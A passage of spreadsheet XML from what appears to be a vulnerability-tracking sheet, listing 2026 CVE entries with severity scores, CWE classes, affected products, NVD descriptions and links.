          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1705" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1705" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1705" s="5" t="inlineStr"/>
      <c r="K1705" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1705" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization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M1705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87644</t>
        </is>
      </c>
    </row>
    <row r="1706">
      <c r="A1706" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87648</t>
        </is>
      </c>
      <c r="C1706" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1706" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1706" s="5" t="inlineStr"/>
      <c r="F1706" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1706" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1706" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1706" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1706" s="5" t="inlineStr"/>
      <c r="K1706" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1706" s="5" t="inlineStr">
        <is>
          <t>Use after free in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87648</t>
        </is>
      </c>
    </row>
    <row r="1707">
      <c r="A1707" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88883</t>
        </is>
      </c>
      <c r="C1707" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1707" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1707" s="5" t="inlineStr"/>
      <c r="F1707" s="5" t="inlineStr"/>
      <c r="G1707" s="5" t="inlineStr"/>
      <c r="H1707" s="5" t="inlineStr"/>
      <c r="I1707" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1707" s="5" t="inlineStr"/>
      <c r="K1707" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1707" s="5" t="inlineStr">
        <is>
          <t>Renovate is an automated dependency update tool. In versions before 44.14.4 (and Mend Renovate CE/EE images before 15.4.0 and the mend-renovate-enterprise-edition Helm chart before 10.4.0), log sanitisation for TLS private keys used for Mutual TLS was incomplete. While the value of hostRules[].httpsPrivateKey was redacted in the field itself, the same private key value was not redacted if it also appeared elsewhere — for example in another configuration option or in a log message under a key other than httpsPrivateKey — causing the full private key to be written to Renovate's logs in cleartext. This affects deployments that configure Mutual TLS through hostRules[].httpsPrivateKey without passing the value through the documented `secrets` configuration. Anyone able to read the resulting logs can recover the private key. The issue is fixed in Renovate 44.14.4, which redacts any value supplied as hostRules[].httpsPrivateKey wherever it appears in the logs; as a workaround, supply the key via the `secrets` configuration.</t>
        </is>
      </c>
      <c r="M1707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88883</t>
        </is>
      </c>
    </row>
    <row r="1708">
      <c r="A1708" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12855</t>
        </is>
      </c>
      <c r="C1708" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1708" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1708" s="5" t="inlineStr"/>
      <c r="F1708" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1708" s="5" t="inlineStr"/>
      <c r="H1708" s="5" t="inlineStr"/>
      <c r="I1708" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1708" s="5" t="inlineStr"/>
      <c r="K1708" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1708" s="5" t="inlineStr">
        <is>
          <t>Unvalidated memory boundary could result in arbitrary code execution. The vulnerability exists in the code developed specifically for HP projects.</t>
        </is>
      </c>
      <c r="M1708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12855</t>
        </is>
      </c>
    </row>
    <row r="1709">
      <c r="A1709" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18664</t>
        </is>
      </c>
      <c r="C1709" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1709" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1709" s="5" t="inlineStr"/>
      <c r="F1709" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1709" s="5" t="inlineStr"/>
      <c r="H1709" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="I1709" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1709" s="5" t="inlineStr"/>
      <c r="K1709" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-697</t>
        </is>
      </c>
      <c r="L1709" s="5" t="inlineStr">
        <is>
          <t>When ranges are used for access control (i.e. of the form 1.2.3.4-1.2.3.25), because NSD wrongly compares the IP address with the range on little endian systems, IPs that were meant to be allowed may be denied, and, IPs that were meant to be denied access could be allowed. An IPv4 address is compared with IPv4 ranges as unsigned 32 bit numbers directly with the endianness of the host, but the values to compare are in network byte order (big-endian).  With IPv6 addresses the comparison is done in 4 times a unsigned 32 bit number comparison, again with the endianness of the host where all values are actually in network bye order.</t>
        </is>
      </c>
      <c r="M1709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18664</t>
        </is>
      </c>
    </row>
    <row r="1710">
      <c r="A1710" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18730</t>
        </is>
      </c>
      <c r="C1710" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1710" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1710" s="5" t="inlineStr"/>
      <c r="F1710" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1710" s="5" t="inlineStr"/>
      <c r="H1710" s="5" t="inlineStr">
        <is>
          <t>github:enterprise_server</t>
        </is>
      </c>
      <c r="I1710" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1710" s="5" t="inlineStr"/>
      <c r="K1710" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1710" s="5" t="inlineStr">
        <is>
          <t>A server-side request forgery (SSRF) vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to cause the Manage API to send crafted outbound requests to an attacker-controlled host. An unauthenticated endpoint parsed an attacker-supplied cluster configuration and issued gateway-to-agent requests whose HMAC authenticated only a timestamp, not the request path or body. An attacker positioned to intercept the outbound request could capture this token and replay it against privileged management agent endpoints. High-availability deployments were not affected due to a topology restriction. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.17.19, 3.18.13, 3.19.10, 3.20.6, and 3.21.4. This vulnerability was reported via the GitHub Bug Bounty program.</t>
        </is>
      </c>
      <c r="M1710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18730</t>
        </is>
      </c>
    </row>
    <row r="1711">
      <c r="A1711" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19401</t>
        </is>
      </c>
      <c r="C1711" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1711" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1711" s="5" t="inlineStr"/>
      <c r="F1711" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1711" s="5" t="inlineStr"/>
      <c r="H1711" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="I1711" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1711" s="5" t="inlineStr"/>
      <c r="K1711" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-617</t>
        </is>
      </c>
      <c r="L1711" s="5" t="inlineStr">
        <is>
          <t>Any remote client can crash a (debugging/non-release build type) NSD serve child by sending it a special crafted message with a specially tuned number of DNS Cookie options (17 when UDP payload size is 512). By continuously crashing the serve childs, the remote client can severely hamper or, when positioned sufficiently close, deny all DNS service.</t>
        </is>
      </c>
      <c r="M1711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19401</t>
        </is>
      </c>
    </row>
    <row r="1712">
      <c r="A1712" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19538</t>
        </is>
      </c>
      <c r="C1712" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1712" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1712" s="5" t="inlineStr"/>
      <c r="F1712" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1712" s="5" t="inlineStr"/>
      <c r="H1712" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="I1712" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1712" s="5" t="inlineStr"/>
      <c r="K1712" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-672</t>
        </is>
      </c>
      <c r="L1712" s="5" t="inlineStr">
        <is>
          <t>The BLOCKED access control list items that are evaluated to deny access on the the proxy protocol port can be bypassed completely when connecting over TCP or TLS and sending the query twice on connection that is kept open.</t>
        </is>
      </c>
      <c r="M1712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19538</t>
        </is>
      </c>
    </row>
    <row r="1713">
      <c r="A1713" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24262</t>
        </is>
      </c>
      <c r="C1713" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1713" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1713" s="5" t="inlineStr"/>
      <c r="F1713" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1713" s="5" t="inlineStr"/>
      <c r="H1713" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="I1713" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1713" s="5" t="inlineStr"/>
      <c r="K1713" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1713" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause an out-of-bounds write. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="M1713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24262</t>
        </is>
      </c>
    </row>
    <row r="1714">
      <c r="A1714" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24263</t>
        </is>
      </c>
      <c r="C1714" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1714" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1714" s="5" t="inlineStr"/>
      <c r="F1714" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1714" s="5" t="inlineStr"/>
      <c r="H1714" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="I1714" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1714" s="5" t="inlineStr"/>
      <c r="K1714" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1714" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause a NULL pointer dereference. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="M1714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24263</t>
        </is>
      </c>
    </row>
    <row r="1715">
      <c r="A1715" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26007</t>
        </is>
      </c>
      <c r="C1715" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1715" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1715" s="5" t="inlineStr"/>
      <c r="F1715" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1715" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1715" s="5" t="inlineStr">
        <is>
          <t>cryptography.io:cryptography</t>
        </is>
      </c>
      <c r="I1715" s="5" t="inlineStr">
        <is>
          <t>2026-02-10</t>
        </is>
      </c>
      <c r="J1715" s="5" t="inlineStr"/>
      <c r="K1715" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-354</t>
        </is>
      </c>
      <c r="L1715" s="5" t="inlineStr">
        <is>
          <t>cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 46.0.5, the public_key_from_numbers (or EllipticCurvePublicNumbers.public_key()), EllipticCurvePublicNumbers.public_key(), load_der_public_key() and load_pem_public_key() functions do not verify that the point belongs to the expected prime-order subgroup of the curve. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor &gt; 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this. This vulnerability is fixed in 46.0.5.</t>
        </is>
      </c>
      <c r="M1715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26007</t>
        </is>
      </c>
    </row>
    <row r="1716">
      <c r="A1716" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28498</t>
        </is>
      </c>
      <c r="C1716" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1716" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1716" s="5" t="inlineStr"/>
      <c r="F1716" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1716" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1716" s="5" t="inlineStr">
        <is>
          <t>authlib:authlib</t>
        </is>
      </c>
      <c r="I1716" s="5" t="inlineStr">
        <is>
          <t>2026-03-16</t>
        </is>
      </c>
      <c r="J1716" s="5" t="inlineStr"/>
      <c r="K1716" s="5" t="inlineStr">
        <is>
          <t>CWE-325, CWE-354, CWE-573</t>
        </is>
      </c>
      <c r="L1716" s="5" t="inlineStr">
        <is>
          <t>Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9.</t>
        </is>
      </c>
      <c r="M1716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28498</t>
        </is>
      </c>
    </row>
    <row r="1717">
      <c r="A1717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33810</t>
        </is>
      </c>
      <c r="C1717" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1717" s="5" t="inlineStr"/>
      <c r="F1717" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1717" s="5" t="inlineStr"/>
      <c r="H1717" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I1717" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J1717" s="5" t="inlineStr"/>
      <c r="K1717" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-295</t>
        </is>
      </c>
      <c r="L1717" s="5" t="inlineStr">
        <is>
          <t>When verifying a certificate chain containing excluded DNS constraints, these constraints are not correctly applied to wildcard DNS SANs which use a different case than the constraint. This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool.</t>
        </is>
      </c>
      <c r="M1717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33810</t>
        </is>
      </c>
    </row>
    <row r="1718">
      <c r="A1718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41424</t>
        </is>
      </c>
      <c r="C1718" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1718" s="5" t="inlineStr"/>
      <c r="F1718" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1718" s="5" t="inlineStr"/>
      <c r="H1718" s="5" t="inlineStr"/>
      <c r="I1718" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1718" s="5" t="inlineStr"/>
      <c r="K1718" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1718" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.9.0 until 4.10.4 and 4.14.6, PUT /security/users/{user_id} in api/api/controllers/security_controller.py passes request.get("user") instead of request.context['token_info']['sub'] as current_user. remove_nones_to_dict() removes the resulting None value, so the reserved-account protection in framework/wazuh/security.py cannot verify who is making the request. An authenticated user with the users_admin role can overwrite the password of protected administrator accounts with user IDs at or below 99, including the wazuh superuser, and gain full administrative control. This issue is fixed in versions 4.10.4 and 4.14.6.</t>
        </is>
      </c>
      <c r="M1718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41424</t>
        </is>
      </c>
    </row>
    <row r="1719">
      <c r="A1719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41604</t>
        </is>
      </c>
      <c r="C1719" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1719" s="5" t="inlineStr"/>
      <c r="F1719" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1719" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1719" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I1719" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J1719" s="5" t="inlineStr"/>
      <c r="K1719" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1719" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds Read vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41604</t>
        </is>
      </c>
    </row>
    <row r="1720">
      <c r="A1720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44487</t>
        </is>
      </c>
      <c r="C1720" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1720" s="5" t="inlineStr"/>
      <c r="F1720" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1720" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1720" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1720" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1720" s="5" t="inlineStr"/>
      <c r="K1720" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L1720" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’s Node.js HTTP adapter may forward a Proxy-Authorization header to a redirected origin during specific proxy-to-direct redirect flows. This affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M1720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44487</t>
        </is>
      </c>
    </row>
    <row r="1721">
      <c r="A1721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44506</t>
        </is>
      </c>
      <c r="C1721" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1721" s="5" t="inlineStr"/>
      <c r="F1721" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1721" s="5" t="inlineStr"/>
      <c r="H1721" s="5" t="inlineStr"/>
      <c r="I1721" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1721" s="5" t="inlineStr"/>
      <c r="K1721" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1721" s="5" t="inlineStr">
        <is>
          <t>Medplum is a developer platform that enables development of healthcare apps. In Medplum versions 4.1.10 through 5.1.6, the /oauth2/register endpoint could return the client_secret of preconfigured OAuth clients defined via the defaultOAuthClients server configuration when a matching redirect_uri was provided. This issue has been patched in version 5.1.7.</t>
        </is>
      </c>
      <c r="M1721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44506</t>
        </is>
      </c>
    </row>
    <row r="1722">
      <c r="A1722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47626</t>
        </is>
      </c>
      <c r="C1722" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1722" s="5" t="inlineStr"/>
      <c r="F1722" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1722" s="5" t="inlineStr"/>
      <c r="H1722" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="I1722" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1722" s="5" t="inlineStr"/>
      <c r="K1722" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1722" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause an out-of-bounds write. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="M1722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47626</t>
        </is>
      </c>
    </row>
    <row r="1723">
      <c r="A1723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47719</t>
        </is>
      </c>
      <c r="C1723" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1723" s="5" t="inlineStr"/>
      <c r="F1723" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1723" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1723" s="5" t="inlineStr"/>
      <c r="I1723" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1723" s="5" t="inlineStr"/>
      <c r="K1723" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1723" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. Prior to 1.3.2, the DEVICE_WEBAPI_REQUEST and DEVICE_PROPERTY Socket.IO handlers in server/runtime/index.js omit isSocketWriteAuthorized and accept attacker-controlled property.address or endpoint connection data. A remote unauthenticated attacker can make server/runtime/devices/httprequest/index.js call axios.get against arbitrary HTTP or HTTPS destinations, connect to reachable OPC UA or ODBC services, and receive results through the corresponding Socket.IO event. This read SSRF oracle can expose cloud instance metadata, internal administrative services, industrial endpoints, and ODBC data reachable from the FUXA host, including when secureEnabled is true. This issue is fixed in version 1.3.2.</t>
        </is>
      </c>
      <c r="M1723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47719</t>
        </is>
      </c>
    </row>
    <row r="1724">
      <c r="A1724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48763</t>
        </is>
      </c>
      <c r="C1724" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1724" s="5" t="inlineStr"/>
      <c r="F1724" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1724" s="5" t="inlineStr"/>
      <c r="H1724" s="5" t="inlineStr"/>
      <c r="I1724" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1724" s="5" t="inlineStr"/>
      <c r="K1724" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1724" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Versions prior to 3.17.0 expose a deprecated public upload endpoint at `GET /api/v1/typebots/{typebotId}/blocks/{blockId}/storage/upload-url` that accepts an attacker-controlled `filePath` and returns a presigned S3 `PUT` URL for that exact key. Because the endpoint only checks that the referenced typebot is public and that the referenced block is a file input block, an unauthenticated attacker who knows a valid public `typebotId` and `blockId` can request presigned upload URLs for arbitrary objects in the shared bucket, including `private/...` and other tenants' `public/...` paths. Version 3.17.0 fixes this issue.</t>
        </is>
      </c>
      <c r="M1724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48763</t>
        </is>
      </c>
    </row>
    <row r="1725">
      <c r="A1725" s="5" t="inlineStr">
